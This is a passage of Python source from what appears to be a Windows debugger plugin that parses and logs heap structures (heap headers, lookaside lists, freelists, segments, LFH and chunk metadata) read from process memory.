if defvalue > 0:
names.append(allvalues[defvalue][0])
return names
def getNtGlobalFlagValueData(flagvalue):
toreturn = ["",""]
if flagvalue in getNtGlobalFlagDefinitions():
toreturn = getNtGlobalFlagDefinitions()[flagvalue]
return toreturn
def getActiveFlagNames(flagvalue):
currentflags = getNtGlobalFlagValues(flagvalue)
flagdefs = getNtGlobalFlagDefinitions()
flagnames = []
if len(currentflags) == 0:
currentflags = [0]
for flag in currentflags:
if flag in flagdefs:
flagdata = flagdefs[flag]
flagnames.append(flagdata[0])
return ",".join(flagnames)
def getNtGlobalFlagValueName(flagvalue):
data = getNtGlobalFlagValueData(flagvalue)
toreturn = ""
if data[0] != "":
toreturn += "+" + data[0]
else:
toreturn += " "
toreturn += " - "
toreturn += data[1]
return toreturn
#---------------------------------------#
# Class for heap structures #
#---------------------------------------#
class MnHeap:
"""
Class for heap structures
"""
heapbase = 0
EncodeFlagMask = 0
Encoding = 0
# _HEAP
# Windows XP
# ----------
# +0x000 Entry : _HEAP_ENTRY
# +0x008 Signature : Uint4B
# +0x00c Flags : Uint4B
# +0x010 ForceFlags : Uint4B
# +0x014 VirtualMemoryThreshold : Uint4B
# +0x018 SegmentReserve : Uint4B
# +0x01c SegmentCommit : Uint4B
# +0x020 DeCommitFreeBlockThreshold : Uint4B
# +0x024 DeCommitTotalFreeThreshold : Uint4B
# +0x028 TotalFreeSize : Uint4B
# +0x02c MaximumAllocationSize : Uint4B
# +0x030 ProcessHeapsListIndex : Uint2B
# +0x032 HeaderValidateLength : Uint2B
# +0x034 HeaderValidateCopy : Ptr32 Void
# +0x038 NextAvailableTagIndex : Uint2B
# +0x03a MaximumTagIndex : Uint2B
# +0x03c TagEntries : Ptr32 _HEAP_TAG_ENTRY
# +0x040 UCRSegments : Ptr32 _HEAP_UCR_SEGMENT
# +0x044 UnusedUnCommittedRanges : Ptr32 _HEAP_UNCOMMMTTED_RANGE
# +0x048 AlignRound : Uint4B
# +0x04c AlignMask : Uint4B
# +0x050 VirtualAllocdBlocks : _LIST_ENTRY
# +0x058 Segments : [64] Ptr32 _HEAP_SEGMENT
# +0x158 u : __unnamed
# +0x168 u2 : __unnamed
# +0x16a AllocatorBackTraceIndex : Uint2B
# +0x16c NonDedicatedListLength : Uint4B
# +0x170 LargeBlocksIndex : Ptr32 Void
# +0x174 PseudoTagEntries : Ptr32 _HEAP_PSEUDO_TAG_ENTRY
# +0x178 FreeLists : [128] _LIST_ENTRY
# +0x578 LockVariable : Ptr32 _HEAP_LOCK
# +0x57c CommitRoutine : Ptr32 long
# +0x580 FrontEndHeap : Ptr32 Void
# +0x584 FrontHeapLockCount : Uint2B
# +0x586 FrontEndHeapType : UChar
# +0x587 LastSegmentIndex : UChar
# Windows 7
# ---------
# +0x000 Entry : _HEAP_ENTRY
# +0x008 SegmentSignature : Uint4B
# +0x00c SegmentFlags : Uint4B
# +0x010 SegmentListEntry : _LIST_ENTRY
# +0x018 Heap : Ptr32 _HEAP
# +0x01c BaseAddress : Ptr32 Void
# +0x020 NumberOfPages : Uint4B
# +0x024 FirstEntry : Ptr32 _HEAP_ENTRY
# +0x028 LastValidEntry : Ptr32 _HEAP_ENTRY
# +0x02c NumberOfUnCommittedPages : Uint4B
# +0x030 NumberOfUnCommittedRanges : Uint4B
# +0x034 SegmentAllocatorBackTraceIndex : Uint2B
# +0x036 Reserved : Uint2B
# +0x038 UCRSegmentList : _LIST_ENTRY
# +0x040 Flags : Uint4B
# +0x044 ForceFlags : Uint4B
# +0x048 CompatibilityFlags : Uint4B
# +0x04c EncodeFlagMask : Uint4B
# +0x050 Encoding : _HEAP_ENTRY
# +0x058 PointerKey : Uint4B
# +0x05c Interceptor : Uint4B
# +0x060 VirtualMemoryThreshold : Uint4B
# +0x064 Signature : Uint4B
# +0x068 SegmentReserve : Uint4B
# +0x06c SegmentCommit : Uint4B
# +0x070 DeCommitFreeBlockThreshold : Uint4B
# +0x074 DeCommitTotalFreeThreshold : Uint4B
# +0x078 TotalFreeSize : Uint4B
# +0x07c MaximumAllocationSize : Uint4B
# +0x080 ProcessHeapsListIndex : Uint2B
# +0x082 HeaderValidateLength : Uint2B
# +0x084 HeaderValidateCopy : Ptr32 Void
# +0x088 NextAvailableTagIndex : Uint2B
# +0x08a MaximumTagIndex : Uint2B
# +0x08c TagEntries : Ptr32 _HEAP_TAG_ENTRY
# +0x090 UCRList : _LIST_ENTRY
# +0x098 AlignRound : Uint4B
# +0x09c AlignMask : Uint4B
# +0x0a0 VirtualAllocdBlocks : _LIST_ENTRY
# +0x0a8 SegmentList : _LIST_ENTRY
# +0x0b0 AllocatorBackTraceIndex : Uint2B
# +0x0b4 NonDedicatedListLength : Uint4B
# +0x0b8 BlocksIndex : Ptr32 Void
# +0x0bc UCRIndex : Ptr32 Void
# +0x0c0 PseudoTagEntries : Ptr32 _HEAP_PSEUDO_TAG_ENTRY
# +0x0c4 FreeLists : _LIST_ENTRY
# +0x0cc LockVariable : Ptr32 _HEAP_LOCK
# +0x0d0 CommitRoutine : Ptr32 long
# +0x0d4 FrontEndHeap : Ptr32 Void
# +0x0d8 FrontHeapLockCount : Uint2B
# +0x0da FrontEndHeapType : UChar
# +0x0dc Counters : _HEAP_COUNTERS
# +0x130 TuningParameters : _HEAP_TUNING_PARAMETERS
def __init__(self,address):
self.heapbase = address
self.VirtualAllocdBlocks = {}
self.LookAsideList = {}
self.SegmentList = {}
self.lalheads = {}
self.Encoding = 0
self.FrontEndHeap = 0
return None
def getEncodingKey(self):
"""
Retrieves the Encoding key from the current heap
Return: Int, containing the Encoding key (on Windows 7 and up)
or zero on older Operating Systems
"""
self.Encoding = 0
if win7mode:
offset = archValue(0x4c,0x7c)
self.EncodeFlagMask = struct.unpack('<L',dbg.readMemory(self.heapbase+offset,4))[0]
if self.EncodeFlagMask == 0x100000:
if arch == 32:
self.Encoding = struct.unpack('<L',dbg.readMemory(self.heapbase+0x50,4))[0]
elif arch == 64:
self.Encoding = struct.unpack('<L',dbg.readMemory(self.heapbase+0x80+0x8,4))[0]
return self.Encoding
def getHeapChunkHeaderAtAddress(self,thischunk,headersize=8,type="chunk"):
"""
Will convert the bytes placed at a certain address into an MnChunk object
"""
key = self.getEncodingKey()
fullheaderbin = ""
if type == "chunk" or type == "lal" or type == "freelist":
chunktype = "chunk"
if key == 0 and not win7mode:
fullheaderbin = dbg.readMemory(thischunk,headersize)
else:
fullheaderbin = decodeHeapHeader(thischunk,headersize,key)
# if we have heap corruption, thischunk may not be a readable address
# so fullheaderbin would be empty
if len(fullheaderbin) == headersize:
sizebytes = fullheaderbin[0:2]
thissize = struct.unpack('<H',sizebytes)[0]
prevsize = 0
segmentid = 0
flag = 0
unused = 0
tag = 0
if key == 0 and not win7mode:
prevsize = struct.unpack('<H',fullheaderbin[2:4])[0]
segmentid = struct.unpack('<B',fullheaderbin[4:5])[0]
flag = struct.unpack('<B',fullheaderbin[5:6])[0]
unused = struct.unpack('<B',fullheaderbin[6:7])[0]
tag = struct.unpack('<B',fullheaderbin[7:8])[0]
else:
flag = struct.unpack('<B',fullheaderbin[2:3])[0]
tag = struct.unpack('<B',fullheaderbin[3:4])[0]
prevsize = struct.unpack('<H',fullheaderbin[4:6])[0]
segmentid = struct.unpack('<B',fullheaderbin[6:7])[0]
unused = struct.unpack('<B',fullheaderbin[7:8])[0]
flink = 0
blink = 0
if type == "lal" or type == "freelist":
flink = struct.unpack('<L',dbg.readMemory(thischunk+headersize,4))[0]
if type == "freelist":
blink = struct.unpack('<L',dbg.readMemory(thischunk+headersize+4,4))[0]
return MnChunk(thischunk,chunktype,headersize,self.heapbase,0,thissize,prevsize,segmentid,flag,unused,tag,flink,blink)
else:
return MnChunk(thischunk,chunktype,headersize,self.heapbase,0,0,0,0,0,0,0,0,0)
return None
def getFrontEndHeap(self):
"""
Returns the value of the FrontEndHeap field in the heapbase
"""
return readPtrSizeBytes(self.heapbase+getOsOffset("FrontEndHeap"))
def getFrontEndHeapType(self):
"""
Returns the value of the FrontEndHeapType field in the heapbase
"""
return struct.unpack('B',dbg.readMemory(self.heapbase+getOsOffset("FrontEndHeapType"),1))[0]
def getLookAsideHead(self):
"""
Returns the LookAside List Head as a dictionary of dictionaries
"""
if not win7mode:
self.FrontEndHeap = self.getFrontEndHeap()
self.FrontEndHeapType = self.getFrontEndHeapType()
if self.FrontEndHeap > 0 and self.FrontEndHeapType == 0x1 and len(self.lalheads) == 0:
lalindex = 0
startloc = self.FrontEndHeap
while lalindex < 128:
thisptr = self.FrontEndHeap + (0x30 * lalindex)
lalheadfields = {}
# read the next 0x30 bytes and break down into lal head elements
lalheadbin = dbg.readMemory(thisptr,0x30)
lalheadfields["Next"] = struct.unpack('<L',lalheadbin[0:4])[0]
lalheadfields["Depth"] = struct.unpack('<H',lalheadbin[4:6])[0]
lalheadfields["Sequence"] = struct.unpack('<H',lalheadbin[6:8])[0]
lalheadfields["Depth2"] = struct.unpack('<H',lalheadbin[8:0xa])[0]
lalheadfields["MaximumDepth"] = struct.unpack('<H',lalheadbin[0xa:0xc])[0]
lalheadfields["TotalAllocates"] = struct.unpack('<L',lalheadbin[0xc:0x10])[0]
lalheadfields["AllocateMisses"] = struct.unpack('<L',lalheadbin[0x10:0x14])[0]
lalheadfields["AllocateHits"] = struct.unpack('<L',lalheadbin[0x10:0x14])[0]
lalheadfields["TotalFrees"] = struct.unpack('<L',lalheadbin[0x14:0x18])[0]
lalheadfields["FreeMisses"] = struct.unpack('<L',lalheadbin[0x18:0x1c])[0]
lalheadfields["FreeHits"] = struct.unpack('<L',lalheadbin[0x18:0x1c])[0]
lalheadfields["Type"] = struct.unpack('<L',lalheadbin[0x1c:0x20])[0]
lalheadfields["Tag"] = struct.unpack('<L',lalheadbin[0x20:0x24])[0]
lalheadfields["Size"] = struct.unpack('<L',lalheadbin[0x24:0x28])[0]
lalheadfields["Allocate"] = struct.unpack('<L',lalheadbin[0x28:0x2c])[0]
lalheadfields["Free"] = struct.unpack('<L',lalheadbin[0x2c:0x30])[0]
self.lalheads[lalindex] = lalheadfields
lalindex += 1
return self.lalheads
def showLookAsideHead(self,lalindex):
if len(self.lalheads) == 0:
self.getLookAsideHead()
if lalindex in self.lalheads:
thislalhead = self.lalheads[lalindex]
dbg.log(" Next: 0x%08x" % thislalhead["Next"])
dbg.log(" Depth: 0x%04x" % thislalhead["Depth"])
dbg.log(" Sequence: 0x%04x" % thislalhead["Sequence"])
dbg.log(" Depth2: 0x%04x" % thislalhead["Depth2"])
dbg.log(" MaximumDepth: 0x%04x" % thislalhead["MaximumDepth"])
dbg.log(" TotalAllocates: 0x%08x" % thislalhead["TotalAllocates"])
dbg.log(" AllocateMisses/AllocateHits: 0x%08x" % thislalhead["AllocateMisses"])
dbg.log(" TotalFrees: 0x%08x" % thislalhead["TotalFrees"])
dbg.log(" FreeMisses/FreeHits: 0x%08x" % thislalhead["FreeMisses"])
dbg.log(" Type 0x%08x" % thislalhead["Type"])
dbg.log(" Tag: 0x%08x" % thislalhead["Tag"])
dbg.log(" Size: 0x%08x" % thislalhead["Size"])
dbg.log(" Allocate: 0x%08x" % thislalhead["Allocate"])
dbg.log(" Free: 0x%08x" % thislalhead["AllocateMisses"])
return
def getLookAsideList(self):
"""
Retrieves the LookAsideList (if enabled) for the current heap
Returns : a dictionary, key = LAL index
Each element in the dictionary contains a dictionary, using a sequence nr as key,
and each element in this dictionary contains an MnChunk object
"""
lal = {}
if not win7mode:
self.FrontEndHeap = self.getFrontEndHeap()
self.FrontEndHeapType = self.getFrontEndHeapType()
if self.FrontEndHeap > 0 and self.FrontEndHeapType == 0x1:
lalindex = 0
startloc = self.FrontEndHeap
while lalindex < 128:
thisptr = self.FrontEndHeap + (0x30 * lalindex)
lalhead_flink = struct.unpack('<L',dbg.readMemory(thisptr,4))[0]
if lalhead_flink != 0:
thissize = (lalindex * 8)
next_flink = lalhead_flink
seqnr = 0
thislal = {}
while next_flink != 0 and next_flink != startloc:
chunk = self.getHeapChunkHeaderAtAddress(next_flink-8,8,"lal")
next_flink = chunk.flink
thislal[seqnr] = chunk
seqnr += 1
lal[lalindex] = thislal
lalindex += 1
return lal
def getFreeListInUseBitmap(self):
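"""
Reads the 128-bit FreeLists in-use bitmap (4 dwords at heapbase+0x158,
XP/2003 layout) and caches it in the global FreeListBitmap dictionary
Return: list of 128 bits, one per FreeLists[] index
"""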
global FreeListBitmap
if not self.heapbase in FreeListBitmap:
FreeListBitmapHeap = []
cnt = 0
while cnt < 4:
fldword = dbg.readLong(self.heapbase+0x158 + (4 * cnt))
bitmapbits = DwordToBits(fldword)
#print "0x%08x : %s (%d)" % (fldword,bitmapbits,len(bitmapbits))
for thisbit in bitmapbits:
FreeListBitmapHeap.append(thisbit)
cnt += 1
FreeListBitmap[self.heapbase] = FreeListBitmapHeap
return FreeListBitmap[self.heapbase]
def getFreeList(self):
"""
Retrieves the FreeLists (XP/2003) for the current heap
Returns : a dictionary, key = FreeList table index
Each element in the dictionary contains a dictionary, using the FreeList position as key
and each element in this dictionary contains an MnChunk object
"""
freelists = {}
if not win7mode:
flindex = 0
while flindex < 128:
freelistflink = self.heapbase + 0x178 + (8 * flindex) + 4
freelistblink = self.heapbase + 0x178 + (8 * flindex)
endchain = False
try:
tblink = struct.unpack('<L',dbg.readMemory(freelistflink,4))[0]
tflink = struct.unpack('<L',dbg.readMemory(freelistblink,4))[0]
origblink = freelistblink
if freelistblink != tblink:
thisfreelist = {}
endchain = False
thisfreelistindex = 0
pflink = 0
while not endchain:
try:
freelistentry = self.getHeapChunkHeaderAtAddress(tflink-8,8,"freelist")
thisfreelist[thisfreelistindex] = freelistentry
thisfreelistindex += 1
thisblink = struct.unpack('<L',dbg.readMemory(tflink+4,4))[0]
thisflink = struct.unpack('<L',dbg.readMemory(tflink,4))[0]
tflink=thisflink
if (tflink == origblink) or (tflink == pflink):
endchain = True
pflink = tflink
except:
endchain = True
freelists[flindex] = thisfreelist
except:
# advance to the next index even if this freelist entry could not be read,
# otherwise the loop would never terminate
flindex += 1
continue
flindex += 1
return freelists
def getVirtualAllocdBlocks(self):
"""
Retrieves the VirtualAllocdBlocks list from the selected heap
Return: A dictionary, using the start of a virtualallocdblock as key
Each entry in the dictionary contains a MnChunk object, with chunktype set to "virtualalloc"
"""
global VACache
offset = getOsOffset("VirtualAllocdBlocks")
encodingkey = 0
if win7mode:
encodingkey = self.getEncodingKey()
if not self.heapbase in VACache:
try:
# get virtualallocdBlocks for this heap
vaptr = self.heapbase + offset
valistentry = struct.unpack('<L',dbg.readMemory(vaptr,4))[0]
while valistentry != vaptr:
# get VA Header info
# header:
# size size
# (x86) (x64)
# ===== =====
# FLINK 4 8
# BLINK 4 8
# Normal header 8 16 encoded on Win7+
# CommitSize 4 8
# ReserveSize 4 8 = requested size
# BusyBlock 8 16
headersize = 0
heoffset = 0 # HEAP_ENTRY offset (@ BusyBlock)
vaheader = None
flink = 0
blink = 0
commitsize = 0
reservesize = 0
size = 0
if arch == 32:
headersize = 32
heoffset = 24
vaheader = dbg.readMemory(valistentry,headersize)
flink = struct.unpack('<L',vaheader[0:4])[0]
blink = struct.unpack('<L',vaheader[4:8])[0]
commitsize = struct.unpack('<L',vaheader[16:20])[0]
reservesize = struct.unpack('<L',vaheader[20:24])[0]
elif arch == 64:
headersize = 64
heoffset = 48
vaheader = dbg.readMemory(valistentry,headersize)
flink = struct.unpack('<Q',vaheader[0:8])[0]
blink = struct.unpack('<Q',vaheader[8:16])[0]
commitsize = struct.unpack('<Q',vaheader[32:40])[0]
reservesize = struct.unpack('<Q',vaheader[40:48])[0]
size_e = struct.unpack('<H',vaheader[heoffset:heoffset+2])[0]
if win7mode:
size = (size_e ^ (encodingkey & 0xFFFF))
else:
size = size_e
#prevsize = struct.unpack('<H',vaheader[26:28])[0]
prevsize = 0
segmentid = struct.unpack('<B',vaheader[heoffset+4:heoffset+5])[0]
flag = struct.unpack('<B',vaheader[heoffset+5:heoffset+6])[0]
if win7mode:
flag = struct.unpack('<B',vaheader[heoffset+2:heoffset+3])[0]
unused = struct.unpack('<B',vaheader[heoffset+6:heoffset+7])[0]
tag = struct.unpack('<B',vaheader[heoffset+7:])[0]
chunkobj = MnChunk(valistentry,"virtualalloc",headersize,self.heapbase,0,size,prevsize,segmentid,flag,unused,tag,flink,blink,commitsize,reservesize)
self.VirtualAllocdBlocks[valistentry] = chunkobj
valistentry = struct.unpack('<L',dbg.readMemory(valistentry,4))[0]
VACache[self.heapbase] = self.VirtualAllocdBlocks
except:
pass
else:
self.VirtualAllocdBlocks = VACache[self.heapbase]
return self.VirtualAllocdBlocks
def getHeapSegmentList(self):
"""
Will collect all segments for the current heap object
Return: A dictionary, using the start of a segment as key
Each entry in the dictionary has 4 fields :
start of segment, end of segment, FirstEntry and LastValidEntry
"""
self.SegmentList = getSegmentsForHeap(self.heapbase)
# segstart,segend,firstentry,lastentry
return self.SegmentList
def usesLFH(self):
"""
Checks if the current heap has LFH enabled
Return: Boolean
"""
if win7mode:
frontendheaptype = self.getFrontEndHeapType()
if frontendheaptype == 0x2:
return True
else:
return False
else:
return False
def getLFHAddress(self):
"""
Retrieves the address of the Low Fragmentation Heap for the current heap
Return: Int
"""
return readPtrSizeBytes(self.heapbase+getOsOffset("FrontEndHeap"))
def getState(self):
"""
Enumerates all segments, chunks and VirtualAllocdBlocks in the current heap
Return: array of dicts
0 : segments (with segment addy as key), contains list of chunks
1 : vablocks
Key: Heap
Contents:
Segment -> Chunks
VA Blocks
"""
statedata = {}
segments = getSegmentsForHeap(self.heapbase)
for seg in segments:
segstart = segments[seg][0]
segend = segments[seg][1]
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
datablocks = walkSegment(FirstEntry,LastValidEntry,self.heapbase)
statedata[seg] = datablocks
return statedata
"""
Low Fragmentation Heap
"""
class MnLFH():
# +0x000 Lock : _RTL_CRITICAL_SECTION
# +0x018 SubSegmentZones : _LIST_ENTRY
# +0x020 ZoneBlockSize : Uint4B
# +0x024 Heap : Ptr32 Void
# +0x028 SegmentChange : Uint4B
# +0x02c SegmentCreate : Uint4B
# +0x030 SegmentInsertInFree : Uint4B
# +0x034 SegmentDelete : Uint4B
# +0x038 CacheAllocs : Uint4B
# +0x03c CacheFrees : Uint4B
# +0x040 SizeInCache : Uint4B
# +0x048 RunInfo : _HEAP_BUCKET_RUN_INFO
# +0x050 UserBlockCache : [12] _USER_MEMORY_CACHE_ENTRY
# +0x110 Buckets : [128] _HEAP_BUCKET
# +0x310 LocalData : [1] _HEAP_LOCAL_DATA
# blocks : LocalData->SegmentInfos->SubSegments (Mgmt List)->SubSegs
# class attributes
Lock = None
SubSegmentZones = None
ZoneBlockSize = None
Heap = None
SegmentChange = None
SegmentCreate = None
SegmentInsertInFree = None
SegmentDelete = None
CacheAllocs = None
CacheFrees = None
SizeInCache = None
RunInfo = None
UserBlockCache = None
Buckets = None
LocalData = None
def __init__(self,lfhbase):
self.lfhbase = lfhbase
self.populateLFHFields()
return
def populateLFHFields(self):
# read 0x310 bytes and split into pieces
FLHHeader = dbg.readMemory(self.lfhbase,0x310)
self.Lock = FLHHeader[0:0x18]
self.SubSegmentZones = []
self.SubSegmentZones.append(struct.unpack('<L',FLHHeader[0x18:0x1c])[0])
self.SubSegmentZones.append(struct.unpack('<L',FLHHeader[0x1c:0x20])[0])
self.ZoneBlockSize = struct.unpack('<L',FLHHeader[0x20:0x24])[0]
self.Heap = struct.unpack('<L',FLHHeader[0x24:0x28])[0]
self.SegmentChange = struct.unpack('<L',FLHHeader[0x28:0x2c])[0]
self.SegmentCreate = struct.unpack('<L',FLHHeader[0x2c:0x30])[0]
self.SegmentInsertInFree = struct.unpack('<L',FLHHeader[0x30:0x34])[0]
self.SegmentDelete = struct.unpack('<L',FLHHeader[0x34:0x38])[0]
self.CacheAllocs = struct.unpack('<L',FLHHeader[0x38:0x3c])[0]
self.CacheFrees = struct.unpack('<L',FLHHeader[0x3c:0x40])[0]
self.SizeInCache = struct.unpack('<L',FLHHeader[0x40:0x44])[0]
self.RunInfo = []
self.RunInfo.append(struct.unpack('<L',FLHHeader[0x48:0x4c])[0])
self.RunInfo.append(struct.unpack('<L',FLHHeader[0x4c:0x50])[0])
self.UserBlockCache = []
cnt = 0
while cnt < (12*4):
self.UserBlockCache.append(struct.unpack('<L',FLHHeader[0x50+cnt:0x54+cnt])[0])
cnt += 4
def getSegmentInfo(self):
# input : self.LocalData
# output : return SubSegment
return
def getSubSegmentList(self):
# input : SubSegment
# output : subsegment mgmt list
return
def getSubSegment(self):
# input : subsegment list
# output : subsegments/blocks
return
"""
MnHeap Childclass
"""
class MnSegment:
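"""
Class for a single heap segment, used to enumerate the chunks it contains
"""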
def __init__(self,heapbase,segmentstart,segmentend,firstentry=0,lastvalidentry=0):
self.heapbase = heapbase
self.segmentstart = segmentstart
self.segmentend = segmentend
self.firstentry = segmentstart
self.lastvalidentry = segmentend
if firstentry > 0:
self.firstentry = firstentry
if lastvalidentry > 0:
self.lastvalidentry = lastvalidentry
self.chunks = {}
def getChunks(self):
"""
Enumerate all chunks in the current segment
Output : Dictionary, key = chunkptr
Values : MnChunk objects
chunktype will be set to "chunk"
"""
thischunk = self.firstentry
allchunksfound = False
allchunks = {}
nextchunk = thischunk
cnt = 0
savedprevsize = 0
mHeap = MnHeap(self.heapbase)
key = mHeap.getEncodingKey()
while not allchunksfound:
thissize = 0
prevsize = 0
flag = 0
unused = 0
segmentid = 0
tag = 0
headersize = 0x8
try:
fullheaderbin = ""
if key == 0 and not win7mode:
fullheaderbin = dbg.readMemory(thischunk,headersize)
else:
fullheaderbin = decodeHeapHeader(thischunk,headersize,key)
sizebytes = fullheaderbin[0:2]
thissize = struct.unpack('<H',sizebytes)[0]
if key == 0 and not win7mode:
prevsizebytes = struct.unpack('<H',fullheaderbin[2:4])[0]
segmentid = struct.unpack('<B',fullheaderbin[4:5])[0]
flag = struct.unpack('<B',fullheaderbin[5:6])[0]
unused = struct.unpack('<B',fullheaderbin[6:7])[0]
tag = struct.unpack('<B',fullheaderbin[7:8])[0]
else:
flag = struct.unpack('<B',fullheaderbin[2:3])[0]
tag = struct.unpack('<B',fullheaderbin[3:4])[0]
prevsizebytes = struct.unpack('<H',fullheaderbin[4:6])[0]
segmentid = struct.unpack('<B',fullheaderbin[6:7])[0]
unused = struct.unpack('<B',fullheaderbin[7:8])[0]
if savedprevsize == 0:
prevsize = 0
savedprevsize = thissize
else:
prevsize = savedprevsize
savedprevsize = thissize
#prevsize = prevsizebytes
except:
thissize = 0
prevsize = 0
flag = 0
unused = 0
if thissize > 0:
nextchunk = thischunk + (thissize * 8)
else:
nextchunk += headersize
chunktype = "chunk"
if "virtall" in getHeapFlag(flag).lower() or "internal" in getHeapFlag(flag).lower():
#chunktype = "virtualalloc"
headersize = 0x20
if not thischunk in allchunks and thissize > 0:
mChunk = MnChunk(thischunk,chunktype,headersize,self.heapbase,self.segmentstart,thissize,prevsize,segmentid,flag,unused,tag)
allchunks[thischunk] = mChunk
thischunk = nextchunk
if nextchunk >= self.lastvalidentry:
allchunksfound = True
if "last" in getHeapFlag(flag).lower():
allchunksfound = True
cnt += 1
self.chunks = allchunks
return allchunks
"""
Chunk class
"""
class MnChunk:
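"""
Class for a single heap chunk (backend chunk, lookaside/freelist entry or
VirtualAllocdBlock), giving access to its decoded header fields
"""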
chunkptr = 0
chunktype = ""
headersize = 0
extraheadersize = 0
heapbase = 0
segmentbase = 0
size = 0
prevsize = 0
segment = 0
flag = 0
flags = 0
unused = 0
tag = 0
flink = 0
blink = 0
commitsize = 0
reservesize = 0
remaining = 0
hasust = False
dph_block_information_startstamp = 0
dph_block_information_heap = 0
dph_block_information_requestedsize = 0
dph_block_information_actualsize = 0
dph_block_information_traceindex = 0
dph_block_information_stacktrace = 0
dph_block_information_endstamp = 0
def __init__(self,chunkptr,chunktype,headersize,heapbase,segmentbase,size,prevsize,segment,flag,unused,tag,flink=0,blink=0,commitsize=0,reservesize=0):
self.chunkptr = chunkptr
self.chunktype = chunktype
self.extraheadersize = 0
self.remaining = 0
self.dph_block_information_startstamp = 0
self.dph_block_information_heap = 0
self.dph_block_information_requestedsize = 0
self.dph_block_information_actualsize = 0
self.dph_block_information_traceindex = 0
self.dph_block_information_stacktrace = 0
self.dph_block_information_endstamp = 0
self.hasust = False
# if ust/hpa is enabled, the chunk header is followed by a DPH_BLOCK_INFORMATION header (0x20 bytes on x86, 0x40 bytes on x64)
currentflagnames = getNtGlobalFlagNames(getNtGlobalFlag())
if "ust" in currentflagnames:
self.hasust = True
if "hpa" in currentflagnames:
# read DPH header info
if arch == 32:
self.extraheadersize = 0x20
try:
raw_dph_header = dbg.readMemory(chunkptr + headersize,0x20)
self.dph_block_information_startstamp = struct.unpack('<L',raw_dph_header[0:4])[0]
self.dph_block_information_heap = struct.unpack('<L',raw_dph_header[4:8])[0]
self.dph_block_information_requestedsize = struct.unpack('<L',raw_dph_header[8:12])[0]
self.dph_block_information_actualsize = struct.unpack('<L',raw_dph_header[12:16])[0]
self.dph_block_information_traceindex = struct.unpack('<H',raw_dph_header[16:18])[0]
self.dph_block_information_stacktrace = struct.unpack('<L',raw_dph_header[24:28])[0]
self.dph_block_information_endstamp = struct.unpack('<L',raw_dph_header[28:32])[0]
except:
pass
elif arch == 64:
self.extraheadersize = 0x40
# read DPH header info
try:
raw_dph_header = dbg.readMemory(chunkptr + headersize,0x40)
self.dph_block_information_startstamp = struct.unpack('<L',raw_dph_header[0:4])[0]
self.dph_block_information_heap = struct.unpack('<Q',raw_dph_header[8:16])[0]
self.dph_block_information_requestedsize = struct.unpack('<Q',raw_dph_header[16:24])[0]
self.dph_block_information_actualsize = struct.unpack('<Q',raw_dph_header[24:32])[0]
self.dph_block_information_traceindex = struct.unpack('<H',raw_dph_header[32:34])[0]
self.dph_block_information_stacktrace = struct.unpack('<Q',raw_dph_header[48:56])[0]
self.dph_block_information_endstamp = struct.unpack('<L',raw_dph_header[60:64])[0]
except:
pass
self.headersize = headersize
self.heapbase = heapbase
self.segmentbase = segmentbase
self.size = size
self.prevsize = prevsize
self.segment = segment
self.flag = flag
self.flags = flag
self.unused = unused
self.tag = tag
self.flink = flink
self.blink = blink
self.commitsize = commitsize
self.reservesize = reservesize
self.userptr = self.chunkptr + self.headersize + self.extraheadersize
self.usersize = (self.size * heapgranularity) - self.unused - self.extraheadersize
self.remaining = self.unused - self.headersize - self.extraheadersize
self.flagtxt = getHeapFlag(self.flag)
def showChunk(self,showdata = False):
chunkshown = False
if self.chunktype == "chunk":
dbg.log(" _HEAP @ %08x, Segment @ %08x" % (self.heapbase,self.segmentbase))
if win7mode:
iHeap = MnHeap(self.heapbase)
if iHeap.usesLFH():
dbg.log(" Heap has LFH enabled. LFH Heap starts at 0x%08x" % iHeap.getLFHAddress())
if "busy" in self.flagtxt.lower() and "virtallocd" in self.flagtxt.lower():
dbg.log(" ** This chunk may be managed by LFH")
self.flagtxt = self.flagtxt.replace("Virtallocd","Internal")
dbg.log(" ( bytes ) (bytes)")
dbg.log(" HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state")
dbg.log(" %08x %08x %08x %08x [%02x] %08x %08x %08x %s (hex)" % (self.chunkptr,self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.flag,self.userptr,self.usersize,self.unused-self.headersize,self.flagtxt))
dbg.log(" %08d %08d %08d %08d %08d %s (dec)" % (self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.usersize,self.unused-self.headersize,self.flagtxt))
dbg.log("")
chunkshown = True
if self.chunktype == "virtualalloc":
dbg.log(" _HEAP @ %08x, VirtualAllocdBlocks" % (self.heapbase))
dbg.log(" FLINK : 0x%08x, BLINK : 0x%08x" % (self.flink,self.blink))
dbg.log(" CommitSize : 0x%08x bytes, ReserveSize : 0x%08x bytes" % (self.commitsize*heapgranularity, self.reservesize*heapgranularity))
dbg.log(" ( bytes ) (bytes)")
dbg.log(" HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize - state")
dbg.log(" %08x %08x %08x %08x [%02x] %08x %08x %s (hex)" % (self.chunkptr,self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.flag,self.userptr,self.usersize,self.flagtxt))
dbg.log(" %08d %08d %08d %08d %s (dec)" % (self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.usersize,self.flagtxt))
dbg.log("")
chunkshown = True
if chunkshown:
requestedsize = self.usersize
dbg.log(" Chunk header size: 0x%x (%d)" % (self.headersize,self.headersize))
if self.extraheadersize > 0:
dbg.log(" Extra header due to GFlags: 0x%x (%d) bytes" % (self.extraheadersize,self.extraheadersize))
if self.dph_block_information_stacktrace > 0:
dbg.log(" DPH_BLOCK_INFORMATION Header size: 0x%x (%d)" % (self.extraheadersize,self.extraheadersize))
dbg.log(" StartStamp : 0x%08x" % self.dph_block_information_startstamp)
dbg.log(" Heap : 0x%08x" % self.dph_block_information_heap)
dbg.log(" RequestedSize : 0x%08x" % self.dph_block_information_requestedsize)
requestedsize = self.dph_block_information_requestedsize
dbg.log(" ActualSize : 0x%08x" % self.dph_block_information_actualsize)
dbg.log(" TraceIndex : 0x%08x" % self.dph_block_information_traceindex)
dbg.log(" StackTrace : 0x%08x" % self.dph_block_information_stacktrace)
dbg.log(" EndStamp : 0x%08x" % self.dph_block_information_endstamp)
dbg.log(" Size initial allocation request: 0x%x (%d)" % (requestedsize,requestedsize))
dbg.log(" Total space for data: 0x%x (%d)" % (self.usersize + self.unused - self.headersize,self.usersize + self.unused - self.headersize))
dbg.log(" Delta between initial size and total space for data: 0x%x (%d)" % (self.unused - self.headersize, self.unused-self.headersize))
if showdata:
